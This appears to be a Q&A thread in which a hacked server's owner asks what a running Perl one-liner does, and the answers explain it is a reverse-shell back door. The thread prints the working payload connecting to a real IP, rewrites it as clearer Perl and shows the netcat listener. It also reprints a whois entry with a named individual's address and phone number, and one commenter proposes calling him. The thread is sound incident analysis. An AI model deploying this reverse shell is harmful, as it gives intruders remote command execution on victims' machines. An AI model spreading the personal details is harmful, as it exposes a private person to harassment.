# What does this nefarious program do?

Tags: perl

My server got hacked, and `ps aux` shows that it's running this program now:

```
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
```

I don't know Perl...what is this program doing?

Comment: Do a `whois 169.50.9.58` and contact the owner of that address block to report abuse.

Comment: You would do better if you took a step back and considered how others may view your question on first approach. *"What does this perl program do?"* is going to alienate many people, as it is a common prelude to a lazy question. I am surprised that your subject line wasn't rejected as a duplicate. If you make an effort to convey your predicament in the first few words then you would get far fewer close votes.

Answer (score 11, accepted):

It opens a socket to that IP. Then it sets up the `STDIN` to read from it and the `STDOUT` to go to it.  So it builds a direct communication channel between the process and that IP.

Then it goes into a `while` loop in which it runs via `system` whatever comes through `STDIN`.

It does this in a forked process, fire-and-forget (detached) style, where the parent exits right away. So this executes and exits and there is *another* process that talks with that IP and runs commands.

Answer (score 2):

Short answer:

```
system$_ while<>;
```

basically means "as long as there is input, execute the commands you get."

If I run `nc -l -p 1212` on my machine, and then you run this script on your machine, then you open a connection to me where I can issue commands that your machine will run.

Answer (score 2):

That Perl code is equivalent to this

You have already been told what it does; it's clearly malicious

```perl
use IO;

$p = fork;
exit, if ( $p );

$c = IO::Socket::INET->new( PeerAddr => "169.50.9.58:1212" );
STDIN->fdopen( $c, 'r' );
$~->fdopen( $c, 'w' );
system $_ while <>;
```

Here's the result of querying [whois.com](https://www.whois.com/) for that IP address. You may want to send an email to the "abuse" address

```
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '169.50.9.32 - 169.50.9.63'

% Abuse contact for '169.50.9.32 - 169.50.9.63' is 'email@softlayer.com'

inetnum:        169.50.9.32 - 169.50.9.63
netname:        NETBLK-SOFTLAYER-RIPE-CUST-JS17702-RIPE
descr:          VidScale, Inc
country:        US
admin-c:        JS17702-RIPE
tech-c:         JS17702-RIPE
status:         LEGACY
mnt-by:         MAINT-SOFTLAYER-RIPE
created:        2016-01-09T01:24:25Z
last-modified:  2016-01-09T01:24:25Z
source:         RIPE

person:         John Scharber
address:        4406 Whistling Wind Way
address:        Placerville, CA 95667 US
phone:          +1.866.398.7638
nic-hdl:        JS17702-RIPE
abuse-mailbox:  email@vidscale.com
mnt-by:         MAINT-SOFTLAYER-RIPE
created:        2016-01-09T01:24:23Z
last-modified:  2016-01-09T01:24:23Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.88.1 (BLAARKOP)
```

Comment: Clever use of `$~` for golfing.

Comment: The email account that you tried to reach does not exist. Please try double-checking the recipient's email address for typos or unnecessary spaces. Learn more at https://support.google.com/mail/?p=NoSuchUser

Comment: @davidvgalbraith: Hmm. I would have thought that was probably illegal. The RAA requires that a contact for reports of abuse be maintained by everyone who registers a domain. There's a link on [ICANN Registrar Abuse Reports](https://www.icann.org/resources/pages/abuse-2014-01-29-en) labelled **If you have a complaint regarding a registrar failing to comply with these requirements**. Note that they have no authority over any abuse of their connection, only of the requirements of the registration.

Comment: @davidvgalbraith Then call them. A machine with an IP they own is being used as a C&C relay for bad stuff. See also http://blog.softlayer.com/2013/is-softlayer-spamming-me-how-to-report-abuse

Comment: I'm inclined to call *John Scharber* myself at `+1 866 398 7638`. It can't do any harm to publicise the misdemeanours being committed in his name, or to indicate that his abuse contact address is dead.

Answer (score 0):

The other answers already adequately answer how this back door works. Just to recap, it allows an unprivileged user access to the system without authenticating. You only need to know which port number to connect to in order to run arbitrary programs on the computer.

The reason this is "nefarious" is that it bypasses authentication. If it required you to log in with a valid user name and password, it would not be much different from a basic `telnet` server. (Granted, those are bad too; in today's world you would absolutely require *encrypted* authenticated access, i.e. `ssh` or similar.)

A user who already has legitimate login access to your system has no need to run a program like this. They already have `ssh` access or similar.

The reason intruders install such programs is often that it allows them to pivot from a simple vulnerability (like a simple "Bobby Tables" SQL injection) which only allows them to run a single command. Now they have interactive access and can conveniently run many commands without using (and potentially exposing) the original exploit again; from here, they can probably figure out a way to pivot further on to a privileged account (i.e. `root`), or initiate lateral movement to other systems within your perimeter.